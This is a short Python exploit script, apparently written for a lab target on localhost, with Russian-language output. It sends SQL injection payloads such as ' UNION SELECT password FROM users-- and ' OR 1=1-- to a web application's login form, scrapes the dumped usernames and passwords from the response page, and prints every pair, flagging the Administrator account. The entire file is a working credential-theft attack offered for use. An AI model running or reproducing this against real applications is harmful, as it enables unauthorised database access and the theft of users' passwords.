#!/usr/bin/env python3
import requests
import re
import argparse

parser = argparse.ArgumentParser(description="Exploit script for extracting logins and passwords.")
parser.add_argument("--base-url", default="http://localhost:80", help="Base URL of the target application")
args = parser.parse_args()

BASE_URL = args.base_url

login_payload = "' UNION SELECT login FROM users--"
form_data = {"login": login_payload, "password": "' OR 1=1--"}
response_logins = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True)

password_payload = "' UNION SELECT password FROM users--"
form_data = {"login": password_payload, "password": "' OR 1=1--"}
response_passwords = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True)

logins_raw = re.search(r"<h1>Привет,\s*([^<]*)</h1>", response_logins.text).group(1)
passwords_raw = re.search(r"<h1>Привет,\s*([^<]*)</h1>", response_passwords.text).group(1)

logins= logins_raw.split("',), ('")
passwords = passwords_raw.split("',), ('")


if logins and passwords:
    for i, (login, password) in enumerate(zip(logins, passwords)):
        print(f"  {i+1}. Логин: {login:<20} Пароль: {password}")
        if login == "Administrator":
            print(f"{'*' * 60}")
            print(f"  {i+1}. Логин: {login:<20} Пароль: {password}  <-- !!! ВАЖНО !!!")
            print(f"{'*' * 60}")
else:
    print("Не удалось извлечь данные.")